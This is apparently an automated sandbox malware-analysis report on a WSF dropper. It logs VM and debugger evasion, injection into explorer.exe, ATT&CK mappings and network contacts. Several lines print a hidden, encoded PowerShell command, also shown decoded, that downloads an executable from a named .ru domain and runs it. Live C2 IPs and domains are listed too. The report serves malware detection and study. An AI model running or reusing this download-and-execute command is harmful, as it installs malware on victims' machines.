        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_9-4086
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_5-4151
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
        Source: C:\Users\user\AppData\Roaming\fbhbvciAPI/Special instruction interceptor: Address: 7FFE2220E814
        Source: C:\Users\user\AppData\Roaming\fbhbvciAPI/Special instruction interceptor: Address: 7FFE2220D584
        Source: fbhbvci, 00000009.00000002.2270759679.000000000081E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3696Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6167Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 423Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 883Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036Thread sleep count: 3696 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036Thread sleep count: 6167 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep time: -16602069666338586s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exe TID: 4020Thread sleep count: 341 > 30Jump to behavior
        Source: C:\Windows\explorer.exe TID: 5744Thread sleep count: 37 > 30Jump to behavior
        Source: C:\Windows\explorer.exe TID: 6892Thread sleep count: 43 > 30Jump to behavior
        Source: C:\Windows\explorer.exe TID: 4604Thread sleep count: 423 > 30Jump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00418A70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418CA4h5_2_00418A70
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_00418A70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418CA4h9_2_00418A70
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: explorer.exe, 00000008.00000002.2951802607.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: powershell.exe, 00000003.00000002.1934192527.00000232755C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
        Source: powershell.exe, 00000003.00000002.1934192527.00000232755C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yn
        Source: explorer.exe, 00000008.00000002.2950964073.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
        Source: explorer.exe, 00000008.00000002.2950964073.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
        Source: explorer.exe, 00000008.00000002.2951802607.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: explorer.exe, 00000008.00000000.1976285647.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
        Source: explorer.exe, 00000008.00000000.1981006235.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: explorer.exe, 00000008.00000002.2948543832.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
        Source: explorer.exe, 00000008.00000002.2950964073.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
        Source: explorer.exe, 00000008.00000000.1980163122.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1980163122.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2950964073.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: explorer.exe, 00000008.00000000.1981006235.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: explorer.exe, 00000008.00000000.1978252250.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2948543832.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
        Source: explorer.exe, 00000008.00000000.1980163122.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
        Source: explorer.exe, 00000008.00000000.1976285647.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: powershell.exe, 00000003.00000002.1932207758.0000023275435000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: explorer.exe, 00000008.00000000.1976285647.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSystem information queried: ModuleInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSystem information queried: CodeIntegrityInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciSystem information queried: CodeIntegrityInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_9-4086
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_5-4151
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_006A092B mov eax, dword ptr fs:[00000030h]5_2_006A092B
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_006A0D90 mov eax, dword ptr fs:[00000030h]5_2_006A0D90
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00790D1C push dword ptr fs:[00000030h]5_2_00790D1C
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_007B092B mov eax, dword ptr fs:[00000030h]9_2_007B092B
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_007B0D90 mov eax, dword ptr fs:[00000030h]9_2_007B0D90
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_0082FF5C push dword ptr fs:[00000030h]9_2_0082FF5C

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\explorer.exeFile created: fbhbvci.8.drJump to dropped file
        Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 193.46.217.78 80Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeThread created: C:\Windows\explorer.exe EIP: 7D719F0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciThread created: unknown EIP: 7DC19F0Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $path = $Env:temp+'\oBuf.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://bestmagazineforanimalsunicum.ru/download/svc.exe',$path); Start-Process -FilePath $path
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $path = $Env:temp+'\oBuf.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://bestmagazineforanimalsunicum.ru/download/svc.exe',$path); Start-Process -FilePath $pathJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\oBuf.exe "C:\Users\user\AppData\Local\Temp\oBuf.exe" Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -enc jabwageadaboacaapqagacqarqbuahyaogb0aguabqbwacsajwbcag8aqgb1agyalgblahgazqanadsaiaakagmababpaguabgb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowagacqaywbsagkazqbuahqalgbkag8adwbuagwabwbhagqazgbpagwazqaoaccaaab0ahqacaa6ac8alwbiaguacwb0ag0ayqbnageaegbpag4azqbmag8acgbhag4aaqbtageababzahuabgbpagmadqbtac4acgb1ac8azabvahcabgbsag8ayqbkac8acwb2agmalgblahgazqanacwajabwageadaboackaowagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagacqacabhahqaaaa=
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -ep bypass -enc jabwageadaboacaapqagacqarqbuahyaogb0aguabqbwacsajwbcag8aqgb1agyalgblahgazqanadsaiaakagmababpaguabgb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowagacqaywbsagkazqbuahqalgbkag8adwbuagwabwbhagqazgbpagwazqaoaccaaab0ahqacaa6ac8alwbiaguacwb0ag0ayqbnageaegbpag4azqbmag8acgbhag4aaqbtageababzahuabgbpagmadqbtac4acgb1ac8azabvahcabgbsag8ayqbkac8acwb2agmalgblahgazqanacwajabwageadaboackaowagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagacqacabhahqaaaa=
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -enc jabwageadaboacaapqagacqarqbuahyaogb0aguabqbwacsajwbcag8aqgb1agyalgblahgazqanadsaiaakagmababpaguabgb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowagacqaywbsagkazqbuahqalgbkag8adwbuagwabwbhagqazgbpagwazqaoaccaaab0ahqacaa6ac8alwbiaguacwb0ag0ayqbnageaegbpag4azqbmag8acgbhag4aaqbtageababzahuabgbpagmadqbtac4acgb1ac8azabvahcabgbsag8ayqbkac8acwb2agmalgblahgazqanacwajabwageadaboackaowagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagacqacabhahqaaaa=Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -ep bypass -enc jabwageadaboacaapqagacqarqbuahyaogb0aguabqbwacsajwbcag8aqgb1agyalgblahgazqanadsaiaakagmababpaguabgb0acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowagacqaywbsagkazqbuahqalgbkag8adwbuagwabwbhagqazgbpagwazqaoaccaaab0ahqacaa6ac8alwbiaguacwb0ag0ayqbnageaegbpag4azqbmag8acgbhag4aaqbtageababzahuabgbpagmadqbtac4acgb1ac8azabvahcabgbsag8ayqbkac8acwb2agmalgblahgazqanacwajabwageadaboackaowagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagacqacabhahqaaaa=Jump to behavior
        Source: explorer.exe, 00000008.00000000.1980163122.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1978031984.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2946601436.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000008.00000002.2946601436.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1976559372.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000008.00000002.2946279964.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1976285647.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
        Source: explorer.exe, 00000008.00000002.2946601436.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1976559372.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: explorer.exe, 00000008.00000002.2946601436.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1976559372.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00418A70 InterlockedCompareExchange,GetFocus,ReadConsoleA,FindAtomA,SearchPathA,SetConsoleMode,SearchPathW,GetDefaultCommConfigA,CopyFileExW,CreatePipe,GetEnvironmentStringsW,WriteConsoleOutputA,GetModuleFileNameA,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmW,WaitForSingleObject,SetCommState,GetConsoleAliasesLengthW,GetComputerNameA,CopyFileW,GetFileAttributesA,GetConsoleAliasExesLengthW,GetBinaryType,FormatMessageA,GetLongPathNameA,PurgeComm,LoadLibraryA,MoveFileW,InterlockedCompareExchange,5_2_00418A70
        Source: C:\Windows\explorer.exeCode function: 8_2_07D73520 GetUserNameW,8_2_07D73520
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1994744005.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1994821763.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2270678080.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2270739394.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1994744005.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1994821763.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2270678080.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2270739394.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information22
        Scripting
        Valid Accounts1
        Native API
        22
        Scripting
        1
        DLL Side-Loading
        1
        Deobfuscate/Decode Files or Information
        OS Credential Dumping11
        System Time Discovery
        Remote Services1
        Archive Collected Data
        13
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Exploitation for Client Execution
        1
        DLL Side-Loading
        312
        Process Injection
        3
        Obfuscated Files or Information
        LSASS Memory1
        Account Discovery
        Remote Desktop ProtocolData from Removable Media1
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Command and Scripting Interpreter
        Logon Script (Windows)Logon Script (Windows)12
        Software Packing
        Security Account Manager1
        File and Directory Discovery
        SMB/Windows Admin SharesData from Network Shared Drive4
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts6
        PowerShell
        Login HookLogin Hook1
        DLL Side-Loading
        NTDS214
        System Information Discovery
        Distributed Component Object ModelInput Capture124
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Masquerading
        LSA Secrets611
        Security Software Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts231
        Virtualization/Sandbox Evasion
        Cached Domain Credentials231
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items312
        Process Injection
        DCSync3
        Process Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Hidden Files and Directories
        Proc Filesystem1
        Application Window Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
        System Owner/User Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525801 Sample: UkHkCa3IYV.wsf Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 37 unicexpertmagazine.pw 2->37 39 ceoconstractionstore.pl 2->39 41 bestmagazineforanimalsunicum.ru 2->41 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 8 other signatures 2->53 10 wscript.exe 1 2->10         started        13 fbhbvci 2->13         started        signatures3 process4 signatures5 65 VBScript performs obfuscated calls to suspicious functions 10->65 67 Wscript starts Powershell (via cmd or directly) 10->67 69 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->69 77 2 other signatures 10->77 15 cmd.exe 1 10->15         started        71 Antivirus detection for dropped file 13->71 73 Multi AV Scanner detection for dropped file 13->73 75 Detected unpacking (changes PE section rights) 13->75 79 9 other signatures 13->79 process6 signatures7 87 Suspicious powershell command line found 15->87 89 Wscript starts Powershell (via cmd or directly) 15->89 91 Encrypted powershell cmdline option found 15->91 93 2 other signatures 15->93 18 powershell.exe 14 18 15->18         started        23 conhost.exe 15->23         started        process8 dnsIp9 43 unicexpertmagazine.pw 193.46.217.78, 49730, 49737, 49842 CUBENODEES Spain 18->43 33 C:\Users\user\AppData\Local\Temp\oBuf.exe, PE32 18->33 dropped 55 Powershell drops PE file 18->55 25 oBuf.exe 18->25         started        file10 signatures11 process12 